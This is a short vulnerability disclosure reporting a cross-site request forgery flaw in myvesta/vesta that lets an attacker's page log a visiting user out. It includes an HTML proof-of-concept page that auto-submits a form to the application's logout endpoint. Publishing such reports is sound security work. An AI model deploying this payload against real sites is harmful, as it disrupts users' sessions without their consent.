Cross-Site Request Forgery (CSRF) in myvesta/vesta
Aug 24th 2021
Attacker is able to logout user if a logged in user visits attacker website.
🕵️♂️ Proof of Concept
1.when you logged in open this POC.html in a browser 2.you can check unintentionally you logged out
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://demo.myvesta.com/logout/"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of forging admin or user to unintentional logout.
Tested on Edge, Firefox, chrome and safari.
📍 Location index.php#L3 📝 References csrf